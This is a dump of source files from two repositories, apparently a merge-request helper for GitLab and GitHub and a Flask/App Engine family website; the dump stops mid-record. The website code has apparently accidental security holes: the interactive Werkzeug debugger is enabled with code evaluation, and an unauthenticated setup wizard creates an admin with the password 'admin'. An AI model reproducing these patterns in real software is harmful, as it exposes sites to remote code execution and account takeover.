"text": "from gitlab import Gitlab\n\n\ndef create(key, repository, title, description, head, base='master', close_source_branch=False, reviewer=None,\n label=None, url='https://gitlab.com/', **_):\n if not reviewer:\n reviewer = []\n gl = Gitlab(url=url, private_token=key)\n assignee_ids = [\n gl_id(r, gl.users, 'username')\n for r\n in reviewer\n ]\n project_id = gl_id(repository, gl.projects)\n project = gl.projects.get(project_id)\n mr = project.mergerequests.create({\n 'title': title,\n 'description': description,\n 'source_branch': head,\n 'target_branch': base,\n 'label': label,\n 'assignee_ids': assignee_ids,\n 'remove_source_branch': close_source_branch,\n })\n return str(mr)\n\n\ndef is_integral(var):\n try:\n int(var)\n return True\n except ValueError:\n return False\n\n\ndef gl_id(name, objects, field='name'):\n if is_integral(name):\n return name\n results = objects.list(**{field: name})\n return results[0].id if results else name\n"
},
{
"alpha_fraction": 0.6287878751754761,
"alphanum_fraction": 0.6287878751754761,
"avg_line_length": 28.33333396911621,
"blob_id": "a0c00eebe20550942d7bfba0ef1a2e2b7cf3a25a",
"content_id": "731c994bfd3e8c4d9a9128fe69a3786c4eee485e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 528,
"license_type": "permissive",
"max_line_length": 101,
"num_lines": 18,
"path": "/pullrequest/github.py",
"repo_name": "eerorika/pullrequest",
"src_encoding": "UTF-8",
"text": "from github import Github, Repository\n\n\ndef create(key, repository, title, description, head, base='master', reviewer=None, label=None, **_):\n g = Github(key)\n repo_obj = g.get_repo(repository) # type: Repository.Repository\n pr = repo_obj.create_pull(\n title=title,\n body=description,\n head=head,\n base=base,\n )\n if label:\n pr.add_to_labels(*label)\n if reviewer:\n pr.add_to_assignees(*reviewer)\n pr.create_review_request(reviewers=reviewer)\n return str(pr)\n"
}
] | 5 |
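Called as a library rather than through the cli, a backend takes the token and repo slug directly. A sketch against the GitHub backend; the token and values are placeholders:

```python
# Sketch: invoking the GitHub backend directly, bypassing the cli.
from pullrequest import github

result = github.create(
    key='<personal access token>',
    repository='eerorika/pullrequest',
    title='Fix typo',
    description='Small docs fix',
    head='typo-fix',
    base='master',
    reviewer=['eerorika'],
)
print(result)
```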
trungly/thelyfamily | https://github.com/trungly/thelyfamily | 1154dc484bb39eb6fed6d08472b62c75a4fd0cd2 | 06620e10e6837f878a27f7a38dd2caa4f21f3002 | ef29b0e3b009153e83dce1a6bc985d4e5e37550e | refs/heads/master | 2021-06-30T12:33:14.706435 | 2019-10-13T18:28:06 | 2019-10-13T18:28:06 | 15,833,304 | 1 | 0 | null | 2014-01-12T00:11:16 | 2019-10-13T18:28:16 | 2021-06-02T21:45:58 | HTML |
[
{
"alpha_fraction": 0.6934097409248352,
"alphanum_fraction": 0.6943648457527161,
"avg_line_length": 35.10344696044922,
"blob_id": "dcc103109e8f19c6555e14c38d86673a37106f41",
"content_id": "e2df0f875a05694634e6e0537b46f40ad21fb3ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3141,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 87,
"path": "/family/views/profile.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "from google.appengine.ext import blobstore\nfrom werkzeug.exceptions import Unauthorized, BadRequest\nfrom flask import current_app, g, url_for, render_template, request, flash, redirect\nfrom family.decorators import requires_login\nfrom family.forms import ChangePasswordForm, MemberProfileForm\nfrom family import app\n\n\[email protected]('/profile', methods=['GET'])\n@requires_login\ndef profile():\n form = MemberProfileForm(request.form, g.member.profile)\n return _render_profile(form)\n\n\ndef _render_profile(form):\n form.member_id.data = g.member.key.id()\n form.first_name.data = g.member.first_name\n form.last_name.data = g.member.last_name\n photo_upload_url = blobstore.create_upload_url(url_for('profile_photo'))\n profile_photo_url = g.member.profile.photo_url\n instagram_auth_url = 'https://instagram.com/oauth/authorize/?client_id={client_id}&redirect_uri={redirect_uri}&response_type=code'\n instagram_auth_url = instagram_auth_url.format(\n client_id=current_app.settings.get('instagram.client.id'),\n redirect_uri='http://%s/photos/return' % current_app.settings.get('host.name'),\n )\n facebook_auth_url = 'https://www.facebook.com/dialog/oauth?client_id={app_id}&redirect_uri={redirect_uri}&scope={scope}'\n facebook_auth_url = facebook_auth_url.format(\n app_id=current_app.settings.get('facebook.app.id'),\n redirect_uri='http://%s/facebook/return' % current_app.settings.get('host.name'),\n scope='user_photos'\n )\n\n context = {\n 'form': form,\n 'password_form': ChangePasswordForm(),\n 'photo_upload_url': photo_upload_url,\n 'profile_photo_url': profile_photo_url,\n 'instagram_auth_url': instagram_auth_url,\n 'facebook_auth_url': facebook_auth_url,\n }\n return render_template('profile.html', **context)\n\n\[email protected]('/profile', methods=['POST'])\n@requires_login\ndef profile_update():\n form = MemberProfileForm(request.form)\n\n # ensure members can only update their own profiles\n if str(form.member_id.data) != str(g.member.key.id()):\n return Unauthorized()\n\n if not form.validate():\n return _render_profile(form)\n\n profile = g.member.profile_key.get()\n\n # update member and profile based on form values\n g.member.first_name = form.first_name.data\n g.member.last_name = form.last_name.data\n profile.primary_email = form.primary_email.data\n profile.secondary_email = form.secondary_email.data\n profile.address = form.address.data\n profile.city = form.city.data\n profile.state = form.state.data\n profile.zip = form.zip.data\n profile.mobile_phone = form.mobile_phone.data\n profile.home_phone = form.home_phone.data\n profile.work_phone = form.work_phone.data\n profile.birth_date = form.birth_date.data\n\n profile.put()\n g.member.put()\n flash('Profile updated', 'success')\n\n return redirect(url_for('profile'))\n\n\[email protected]('/profile/notifications/update', methods=['POST'])\n@requires_login\ndef update_notifications():\n if not request.is_xhr:\n return BadRequest()\n\n g.member.profile.update_notifications(request.form)\n return '', 200\n"
},
{
"alpha_fraction": 0.664898157119751,
"alphanum_fraction": 0.6665959358215332,
"avg_line_length": 37,
"blob_id": "d4ef3d5ef2af1f8f5f71e9ed34e3f12970a8cd1b",
"content_id": "f6f3ecca1d73a81ce9710dda372b4b422f7a30f5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4712,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 124,
"path": "/family/models/member.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "import datetime\n\nfrom google.appengine.api import images\nfrom google.appengine.ext import ndb\n\nfrom family.models.instagram import InstagramUser\nfrom family.models.facebook import FacebookUser\nfrom werkzeug.security import generate_password_hash, check_password_hash\nfrom werkzeug.utils import cached_property\nfrom flask import current_app\n\n\nclass Member(ndb.Model):\n \"\"\" Represents a user of this website \"\"\"\n\n first_name = ndb.StringProperty(required=True) # should be unique (as we use it for login)\n first_name_lowercase = ndb.ComputedProperty(lambda self: self.first_name.lower()) # allow case-insensitive login\n last_name = ndb.StringProperty(required=True)\n hashed_password = ndb.StringProperty(required=True)\n is_visible = ndb.BooleanProperty(default=True) # whether this user shows up on Members page\n is_admin = ndb.BooleanProperty(default=False) # whether this user a site admin\n is_subscribed_to_chat = ndb.BooleanProperty(default=False)\n age = ndb.ComputedProperty(lambda self: self.current_age())\n message_board_visited = ndb.DateTimeProperty()\n new_messages = ndb.ComputedProperty(lambda self: self.number_new_messages())\n\n profile_key = ndb.KeyProperty(kind='Profile')\n google_user_key = ndb.KeyProperty(kind='GoogleUser')\n facebook_user_key = ndb.KeyProperty(kind='FacebookUser')\n instagram_user_key = ndb.KeyProperty(kind='InstagramUser')\n\n @cached_property\n def profile(self):\n if self.profile_key:\n return self.profile_key.get()\n else:\n return Profile.create_for_member(self)\n\n @cached_property\n def instagram_user(self):\n if self.instagram_user_key:\n return self.instagram_user_key.get()\n else:\n return InstagramUser.create_for_member(self)\n\n @cached_property\n def facebook_user(self):\n if self.facebook_user_key:\n return self.facebook_user_key.get()\n else:\n return FacebookUser.create_for_member(self)\n\n def current_age(self):\n if not self.profile.birth_date:\n return ''\n return int((datetime.date.today() - self.profile.birth_date).days/365.2425)\n\n def set_password(self, password):\n self.hashed_password = generate_password_hash(password)\n\n def check_password(self, password):\n return check_password_hash(self.hashed_password, password)\n\n def number_new_messages(self):\n query = ndb.gql(\"SELECT __key__ FROM Message WHERE posted_date > :1\", self.message_board_visited)\n return query.count()\n\n\nclass Profile(ndb.Model):\n \"\"\" Represents a member's profile. 
There is a one to one relationship between Member and Profile \"\"\"\n\n    member_key = ndb.KeyProperty(kind=Member)\n    primary_email = ndb.StringProperty()\n    secondary_email = ndb.StringProperty()\n    address = ndb.StringProperty()\n    city = ndb.StringProperty()\n    state = ndb.StringProperty()\n    zip = ndb.StringProperty()\n    mobile_phone = ndb.StringProperty()\n    home_phone = ndb.StringProperty()\n    work_phone = ndb.StringProperty()\n    birth_date = ndb.DateProperty()\n    photo_key = ndb.BlobKeyProperty()\n    notify_message_posted = ndb.BooleanProperty()\n    notify_birthday_reminders = ndb.BooleanProperty()\n\n    @cached_property\n    def member(self):\n        if self.member_key:\n            return self.member_key.get()\n        else:\n            # this profile has no associated member for some reason, search all members for this profile\n            import logging\n            log = logging.getLogger(__name__)\n            log.warning('Hmm, there appears to be an un-owned profile: id=%s' % self.key.id())\n            return Member.query(Member.profile_key == self.key).get()\n\n    @cached_property\n    def photo_url(self):\n        if self.photo_key:\n            try:\n                return images.get_serving_url(str(self.photo_key))\n            except Exception:\n                current_app.logger.error('Could not load member profile photo for %s' % self.member_key)\n                return None\n        else:\n            return None\n\n    def update_notifications(self, selections):\n        all_notify_flags = ['notify_message_posted', 'notify_birthday_reminders']\n        for flag in all_notify_flags:\n            # clear notification flags first because only selected checkbox selections get submitted here\n            setattr(self, flag, False)\n            if flag in selections:\n                setattr(self, flag, True)\n        self.put()\n\n    @classmethod\n    def create_for_member(cls, member):\n        new_profile = Profile(member_key=member.key)\n        new_profile.put()\n        member.profile_key = new_profile.key\n        member.put()\n        return new_profile\n"
},
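The Member/Profile pairing above lazily creates the profile on first access. A usage sketch; it needs an App Engine datastore context (dev server or remote_api shell) to actually run, and all values are placeholders:

```python
# Sketch: one-to-one Member/Profile flow under google.appengine.ext.ndb.
from family.models.member import Member

member = Member(first_name='Trung', last_name='Ly')
member.set_password('s3cret')  # only the hash is stored
member.put()

profile = member.profile       # creates and links a Profile if missing
profile.primary_email = '[email protected]'
profile.put()

assert member.check_password('s3cret')
```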
{
"alpha_fraction": 0.7258785963058472,
"alphanum_fraction": 0.7258785963058472,
"avg_line_length": 38.125,
"blob_id": "940252d9752019eacbaf17887851725134a606ab",
"content_id": "59ee22abc1a14aecccfadfc8eda8b102cde6380c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1565,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 40,
"path": "/family/forms.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "from flask_wtf import Form\nfrom wtforms.ext.appengine.ndb import model_form\nfrom wtforms.fields import StringField, HiddenField, PasswordField\nfrom wtforms import validators\nfrom family.models.member import Profile\nfrom family.models.message import Message\n\n\nBaseProfileForm = model_form(Profile, Form, field_args={\n 'birth_date': {'validators': [validators.optional()]}} # disable DateField validator\n)\n\n\nclass MemberProfileForm(BaseProfileForm):\n member_id = HiddenField()\n first_name = StringField('First Name', [validators.input_required()])\n last_name = StringField('Last Name', [validators.input_required()])\n\n\nclass ChangePasswordForm(Form):\n old_password = PasswordField('Old Password', [validators.input_required()])\n new_password = PasswordField('New Password', [\n validators.input_required(),\n validators.equal_to('confirm_password', message='Passwords must match')\n ])\n confirm_password = PasswordField('Re-type New Password', [\n validators.input_required(),\n validators.equal_to('new_password', message='Passwords must match')\n ])\n\n\nMessageForm = model_form(Message, Form)\n\n\nclass SetupWizardForm(Form):\n admin_first_name = StringField('Admin first name', [validators.input_required()])\n admin_last_name = StringField('Admin last name', [validators.input_required()])\n site_name = StringField('Site name', [validators.input_required()])\n secret_key = StringField('Secret key', [validators.input_required()])\n host_name = StringField('Website address', [validators.input_required()])\n"
},
{
"alpha_fraction": 0.6332230567932129,
"alphanum_fraction": 0.6350606679916382,
"avg_line_length": 35.279998779296875,
"blob_id": "8382d664ca6ebab541413b1bc564189670d2b1fd",
"content_id": "a3cfec7531bdbd12858499cc3f079f7c4c50e010",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2721,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 75,
"path": "/family/views/main.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "import pytz\n\nfrom datetime import datetime\nfrom flask import render_template, request, redirect, url_for\nfrom family.decorators import requires_login\nfrom family.models.member import Member, Profile\nfrom family.forms import SetupWizardForm\nfrom family import app\n\n\nANNOUNCE_RANGE_IN_DAYS = 14\n\n\[email protected]('/', methods=['GET'])\ndef home():\n return render_template(\n 'home.html',\n settings_initialized=app.settings.initialized,\n birthday_reminders=get_birthday_reminders()\n )\n\n\[email protected]('/members', methods=['GET'])\n@requires_login\ndef members():\n members = Member.query().fetch()\n return render_template('members.html', members=members)\n\n\ndef get_birthday_reminders():\n reminders = {}\n profiles = Profile.query()\n for profile in profiles:\n today = datetime.now(pytz.timezone('US/Eastern')).date() # TODO: let users set their timezone in member profile\n bday = profile.birth_date\n if bday:\n delta = bday.timetuple().tm_yday - today.timetuple().tm_yday\n if today.month == bday.month and today.day == bday.day: # can't simply use delta cuz it breaks on leap years\n reminders[profile.member.first_name] = 0\n elif 0 < delta < ANNOUNCE_RANGE_IN_DAYS:\n reminders[profile.member.first_name] = delta\n return sorted(reminders.iteritems(), key=lambda x: x[1]) # returns a list of tuples sorted by delta\n\n\[email protected]('/admin/setup/wizard', methods=['GET', 'POST'])\ndef setup_wizard():\n form = SetupWizardForm(request.form)\n if request.method == 'GET':\n form.admin_first_name.data = ''\n form.admin_last_name.data = ''\n form.site_name.data = app.settings.get('site.name')\n form.secret_key.data = app.settings.get('secret.key')\n form.host_name.data = app.settings.get('host.name')\n elif request.method == 'POST' and form.validate():\n admin = Member.query(\n Member.first_name_lowercase == form.admin_first_name.data.lower()\n and\n Member.first_name_lowercase == form.admin_last_name.data.lower()\n ).get()\n if not admin:\n admin = Member(\n first_name=form.admin_first_name.data,\n last_name=form.admin_last_name.data,\n is_admin=True,\n )\n admin.set_password('admin')\n admin.put()\n\n app.settings.set('site.name', form.site_name.data)\n app.settings.set('secret.key', form.secret_key.data)\n app.settings.set('host.name', form.host_name.data)\n app.settings.set('settings.initialized', True)\n return redirect(url_for('home'))\n\n return render_template('setup_wizard.html', form=form)\n"
},
{
"alpha_fraction": 0.7590529322624207,
"alphanum_fraction": 0.7590529322624207,
"avg_line_length": 24.64285659790039,
"blob_id": "067f1bc9ead09c2f8bdc47924150a4882f827c08",
"content_id": "c67123a9c8e2b11f4d22ff68bcb48c38030e0794",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 718,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 28,
"path": "/family/__init__.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "from flask import Flask\nfrom family.config import setup_config\nfrom family.settings import setup_settings\nfrom family.views import setup_views\nfrom family.utils import NDBModelJSONEncoder\nfrom werkzeug.debug import DebuggedApplication\n\n\ndef create_app():\n flask_app = Flask(__name__)\n\n # load site settings from the database\n setup_settings(flask_app)\n\n # environment-aware configuration\n setup_config(flask_app)\n\n # custom NDB model serializer\n flask_app.json_encoder = NDBModelJSONEncoder\n\n return flask_app\n\n\napp = create_app()\napp.wsgi_app = DebuggedApplication(app.wsgi_app, evalex=True)\n\n# Import views only AFTER 'app' is defined, the object is used in the view decorators\nsetup_views()\n"
},
{
"alpha_fraction": 0.6514523029327393,
"alphanum_fraction": 0.6576763391494751,
"avg_line_length": 20.909090042114258,
"blob_id": "c0a068ce5ba58e789102d7e4b07547a39677adcd",
"content_id": "6e8a204068159a8d054b13c37a920a1a841e2ea5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 482,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 22,
"path": "/family/views/lists.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "from flask import request, render_template, jsonify\n\nfrom family import app\nfrom family.models.list import List\n\n\[email protected]('/lists', methods=['GET'])\ndef lists():\n return render_template('lists.html')\n\n\[email protected]('/api/lists', methods=['GET'])\ndef get_lists():\n all_lists = List.query().fetch()\n return jsonify({'data': all_lists})\n\n\[email protected]('/api/lists', methods=['POST'])\ndef create_list():\n new_list = List(**request.json)\n new_list.put()\n return '', 200\n"
},
{
"alpha_fraction": 0.6663507223129272,
"alphanum_fraction": 0.6672985553741455,
"avg_line_length": 34.16666793823242,
"blob_id": "e80af757d68874aa47257073c97d115ef8d9ef8f",
"content_id": "2ccd9c02061a0f8b9d78054ef4966d106242c984",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1055,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 30,
"path": "/family/models/instagram.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "from google.appengine.ext import ndb\n\n\nclass InstagramUser(ndb.Model):\n \"\"\" Represents an Instagram user including their current access_token \"\"\"\n\n userid = ndb.StringProperty()\n member_key = ndb.KeyProperty(kind='Member')\n access_token = ndb.StringProperty()\n # last_access_date = ndb.DateTimeProperty(auto_now_add=True)\n username = ndb.StringProperty()\n full_name = ndb.StringProperty()\n profile_picture = ndb.StringProperty()\n website = ndb.StringProperty()\n bio = ndb.StringProperty()\n recent_photos_url = ndb.ComputedProperty(\n lambda self: 'https://api.instagram.com/v1/users/{user_id}/media/recent?access_token={access_token}'\n .format(\n user_id=self.userid,\n access_token=self.access_token,\n )\n )\n\n @classmethod\n def create_for_member(cls, member):\n new_instagram_user = InstagramUser(member_key=member.key)\n new_instagram_user.put()\n member.instagram_user_key = new_instagram_user.key\n member.put()\n return new_instagram_user\n"
},
{
"alpha_fraction": 0.6179749965667725,
"alphanum_fraction": 0.6188670992851257,
"avg_line_length": 42.11538314819336,
"blob_id": "52bee13adebc88be3df857d6dbbffa45aae3ed99",
"content_id": "900fe4cdacf46c1d3df00ae3f0da9b986ac979fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4484,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 104,
"path": "/family/views/messages.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "import datetime\n\nfrom google.appengine.api import mail\nfrom google.appengine.ext import ndb\nfrom flask import request, g, render_template, redirect, url_for, flash, current_app\nfrom family import app\nfrom family.decorators import requires_login\nfrom family.forms import MessageForm\nfrom family.models.member import Profile\nfrom family.models.message import Message\n\n\nSHOW_MESSAGES_TIME_DELTA = datetime.timedelta(days=90)\n\n\[email protected]('/messages', methods=['GET'])\n@requires_login\ndef messages():\n \"\"\"('MessageBoard', 'main') is the parent of all messages. Thus, this puts all messages into a single entity group\n \"\"\"\n form = MessageForm()\n ancestor_key = ndb.Key('MessageBoard', 'main')\n cutoff_time = datetime.datetime.now() - SHOW_MESSAGES_TIME_DELTA\n messages = Message.query(Message.posted_date > cutoff_time, ancestor=ancestor_key).order(-Message.posted_date)\n g.member.message_board_visited = datetime.datetime.now()\n g.member.put()\n return render_template('messages.html', form=form, messages=messages,\n notify_message_posted=g.member.profile.notify_message_posted)\n\n\[email protected]('/message/new', methods=['POST'])\n@requires_login\ndef message_new():\n form = MessageForm(request.form)\n if form.validate():\n ancestor_key = ndb.Key('MessageBoard', 'main')\n message = Message(parent=ancestor_key, owner_key=g.member.key, body=form.body.data,\n posted_date=datetime.datetime.now())\n message.put()\n\n # Send notification emails to everyone subscribed\n author = g.member.first_name\n posted_date = datetime.datetime.now().strftime('%A, %B %-d, %Y at %I:%M %p')\n photo_url = g.member.profile.photo_url\n if photo_url:\n image = '%s=s60' % photo_url\n else:\n image = 'http://%s/static/images/male_bust.jpg' % current_app.settings.get('host.name')\n html_body = render_template('email/new_message_posted.html', **dict(\n author=author,\n posted_date=posted_date,\n image=image,\n message_body=message.body,\n ))\n for subscriber in Profile.query(Profile.notify_message_posted == True):\n if subscriber.primary_email:\n # TODO: put a try/except here, for when mail fails\n # here is one error I got once:\n # DeadlineExceededError: The API call mail.Send() took too long to respond and was cancelled.\n mail.send_mail(\n '{email_from} <{email_address}>'.format(\n email_from=current_app.settings.get('messageboard.email.from'),\n email_address=current_app.settings.get('messageboard.email.address')\n ),\n subscriber.primary_email,\n '%s posted a new message on TheLyFamily.com' % g.member.first_name,\n '%s wrote this on %s: %s' % (author, posted_date, message.body),\n html=html_body,\n # reply_to='%s' % current_app.settings.get('messageboard.email.replyto') # TODO: this should post a message on the message board\n )\n return redirect(url_for('messages'))\n\n\[email protected]('/message/edit/<message_id>', methods=['POST'])\n@requires_login\ndef message_edit(message_id):\n form = MessageForm(request.form)\n if form.validate():\n ancestor_key = ndb.Key('MessageBoard', 'main')\n message = Message.get_by_id(int(message_id), parent=ancestor_key)\n if not message:\n flash('Cannot edit. 
Message not found', 'danger')\n elif message.owner != g.member:\n flash('You may only edit your own message', 'danger')\n else:\n flash('Message successfully updated!', 'info')\n message.body = form.data['body']\n message.put()\n return redirect(url_for('messages'))\n\n\[email protected]('/message/delete/<message_id>', methods=['POST'])\n@requires_login\ndef message_delete(message_id):\n if request.form.get('_method', '').lower() == 'delete':\n ancestor_key = ndb.Key('MessageBoard', 'main')\n message = Message.get_by_id(int(message_id), parent=ancestor_key)\n if not message:\n flash('Message not found', 'danger')\n elif message.owner != g.member:\n flash('You may only delete your own message', 'danger')\n else:\n message.key.delete()\n return redirect(url_for('messages'))\n"
},
{
"alpha_fraction": 0.6878698468208313,
"alphanum_fraction": 0.6878698468208313,
"avg_line_length": 31.190475463867188,
"blob_id": "1bfebe61c9653f0b21d3a6f5e0e1a9791f274a3b",
"content_id": "1f714fe02614dcc7af7550c179c87a627d7f2291",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 676,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 21,
"path": "/family/models/facebook.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "from google.appengine.ext import ndb\nfrom family.facebook import Facebook\n\n\nclass FacebookUser(ndb.Model):\n \"\"\" Represents a Facebook user\n \"\"\"\n member_key = ndb.KeyProperty(kind='Member')\n userid = ndb.IntegerProperty()\n access_token = ndb.StringProperty()\n expires_at = ndb.DateTimeProperty()\n scopes = ndb.JsonProperty()\n recent_photos_url = ndb.ComputedProperty(Facebook.uploaded_photos_url)\n\n @classmethod\n def create_for_member(cls, member):\n new_facebook_user = cls(member_key=member.key)\n new_facebook_user.put()\n member.facebook_user_key = new_facebook_user.key\n member.put()\n return new_facebook_user\n"
},
{
"alpha_fraction": 0.5704352855682373,
"alphanum_fraction": 0.5740628838539124,
"avg_line_length": 31.431371688842773,
"blob_id": "82a61380e3a0cb689abc06cae58da3b8f8d5e614",
"content_id": "f3118dc0f74734d73d35925e68603d9402dce2bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3308,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 102,
"path": "/family/settings.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "import yaml\n\nfrom google.appengine.ext import ndb\nfrom google.appengine.api.datastore_errors import BadValueError\n\n\nclass Setting(ndb.Model):\n \"\"\"\n Settings model\n \"\"\"\n name = ndb.StringProperty()\n value = ndb.GenericProperty()\n\n\nclass SiteSettings(object):\n \"\"\"\n A database-backed object that holds settings for the app.\n\n TODO: Consider changing all(as_name_value_list=True) to export() and set(name_value_list) as import(),\n ... thus making the simple dictionary format the 'native' format, while still supporting name-value list format\n \"\"\"\n\n def __init__(self, app):\n \"\"\" Check if settings were initialized; if not, load them from initial_settings.yaml\n \"\"\"\n if not self.get('settings.initialized'):\n f = open('initial_settings.yaml')\n data = yaml.safe_load(f)\n local_settings = data.pop('local.settings')\n if local_settings and isinstance(local_settings, dict):\n data.update(local_settings)\n f.close()\n data['settings.initialized'] = True\n try:\n self.set_all(data)\n except BadValueError, bve:\n app.logger.error('Could not load initial settings file. Check the format.')\n raise bve\n\n @property\n def initialized(self):\n return self.get('settings.initialized')\n\n def get(self, name):\n setting = Setting.query(Setting.name == name).fetch(1)\n if len(setting):\n return setting[0].value\n else:\n return None\n\n def set(self, name, value):\n setting = Setting.query(Setting.name == name).fetch(1)\n if len(setting):\n setting = setting[0]\n setting.value = value\n else:\n setting = Setting(name=name, value=value)\n setting.put()\n\n def get_all(self, as_name_value_list=False):\n \"\"\"\n All the settings as a simple dictionary:\n { setting1: 'value1', setting2: 'value2', ... }\n Or, a name-value list:\n [\n { name: 'setting1', value: 'value1' },\n { name: 'setting2', value: 'value2' },\n ...\n ]\n \"\"\"\n settings_from_db = Setting.query().fetch()\n if as_name_value_list:\n retval = []\n for setting in settings_from_db:\n retval.append({'name': setting.name, 'value': setting.value})\n else:\n retval = dict()\n for setting in settings_from_db:\n retval[setting.name] = setting.value\n\n return retval\n\n def set_all(self, settings):\n for setting in settings:\n if isinstance(setting, basestring):\n self.set(setting, settings[setting])\n elif isinstance(setting, dict):\n # name-value list\n self.set(setting['name'], setting['value'])\n\n def as_yaml(self):\n return {str(key): str(value) for key, value in self.get_all().iteritems()}\n\n\ndef setup_settings(app):\n \"\"\" Instantiate settings object and add them to the template contexts\n \"\"\"\n app.settings = SiteSettings(app)\n\n def add_settings_to_context():\n return dict(settings=app.settings.get_all())\n app.context_processor(add_settings_to_context)\n"
},
{
"alpha_fraction": 0.6479836106300354,
"alphanum_fraction": 0.6527683138847351,
"avg_line_length": 35.12345504760742,
"blob_id": "2f9ab2c1c9f851bb4ee6194bcc7b037d2e12b7ee",
"content_id": "219ea4e0c9d7f2ce0fa38c8f7932e165ae4741f9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2926,
"license_type": "no_license",
"max_line_length": 139,
"num_lines": 81,
"path": "/family/views/wishlist.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "from flask import g, render_template, jsonify, request\nfrom family.decorators import requires_login\nfrom family import app\nfrom family.models.wishlist import WishlistItem\nfrom werkzeug.exceptions import BadRequest\nfrom google.appengine.ext import ndb\n\n\[email protected]('/wishlists')\n@requires_login\ndef wishlists():\n return render_template('wishlists.html')\n\[email protected]('/wishlist', methods=['GET'])\n@requires_login\ndef get_current_user_wishlist():\n results = WishlistItem.query(WishlistItem.owner_key == g.member.key).fetch()\n return jsonify({'items': results})\n\[email protected]('/wishlist', methods=['POST'])\n@requires_login\ndef add_wishlist_item():\n item = WishlistItem(owner_key=g.member.key, **request.json)\n item.put()\n return '', 200\n\[email protected]('/wishlist/<int:id>', methods=['GET'])\n@requires_login\ndef get_member_wishlist(id):\n key = ndb.Key('Member', id)\n wishlist_items = WishlistItem.query(WishlistItem.owner_key == key).fetch()\n serialized_items = []\n for item in wishlist_items:\n # append a giver (member) dict to each wishlist item\n giver = item.giver\n item_dict = item.to_dict()\n item_dict['giver'] = giver.to_dict() if giver else None\n item_dict['id'] = item.key.id()\n serialized_items.append(item_dict)\n is_current_member_wishlist = key == g.member.key\n wishlist_title = 'My wishlist' if is_current_member_wishlist else 'This is %s\\'s wishlist' % key.get().first_name\n return jsonify({'items': serialized_items, 'wishlist_title': wishlist_title, 'is_current_member_wishlist': is_current_member_wishlist})\n\[email protected]('/wishlist/<int:id>', methods=['DELETE'])\n@requires_login\ndef delete_member_wishlist_item(id):\n # only allow delete own items\n item = WishlistItem.get_by_id(id)\n if item and item.owner_key == g.member.key:\n item.key.delete()\n return '', 200\n else:\n return BadRequest()\n\[email protected]('/wishlist/<int:id>', methods=['PUT'])\n@requires_login\ndef update_member_wishlist_item(id):\n status = request.json['status']\n item = WishlistItem.get_by_id(id)\n # only allow 'reserve' and 'lock' actions\n if item and status == 'open' or status == 'reserved' or status == 'locked':\n item.update_status(status, g.member.key)\n return jsonify({'owner_id': item.owner_key.id()})\n else:\n return BadRequest()\n\[email protected]('/wishlist/members', methods=['GET'])\n@requires_login\ndef get_members_with_wishlists():\n \"\"\" returns json in the form of:\n \"members\": {\n [\n \"first_name\": \"Trung\",\n \"id\": 12345678 // member's id\n ],\n ...\n }\n \"\"\"\n member_wishlists = WishlistItem.query(projection=[\"owner_key\"], group_by=[\"owner_key\"]).fetch()\n members = [{'first_name': item.owner_key.get().first_name, 'id': item.owner_key.id()} for item in member_wishlists]\n return jsonify({'members': members})\n"
},
{
"alpha_fraction": 0.41111111640930176,
"alphanum_fraction": 0.41111111640930176,
"avg_line_length": 22.6842098236084,
"blob_id": "0d3f36ee9f16ad1026ef50474efa7534610945ad",
"content_id": "105cb0d2a2b3b44c3d20457af4db85ff8f8d882d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 450,
"license_type": "permissive",
"max_line_length": 55,
"num_lines": 19,
"path": "/static/js/app.js",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "$(function() {\n\n // submit login via Ajax\n $(\"#login-form\").submit(function(event) {\n event.preventDefault();\n $.ajax({\n type: \"POST\",\n url: \"/login\",\n data: $(this).serialize(),\n success: function() {\n window.location.reload();\n },\n error: function() {\n $(\"#login-error\").removeClass(\"hidden\")\n }\n });\n });\n\n});\n"
},
{
"alpha_fraction": 0.5838384032249451,
"alphanum_fraction": 0.5865319967269897,
"avg_line_length": 36.125,
"blob_id": "8810d0f396af76e21d9831043d72be0836670a73",
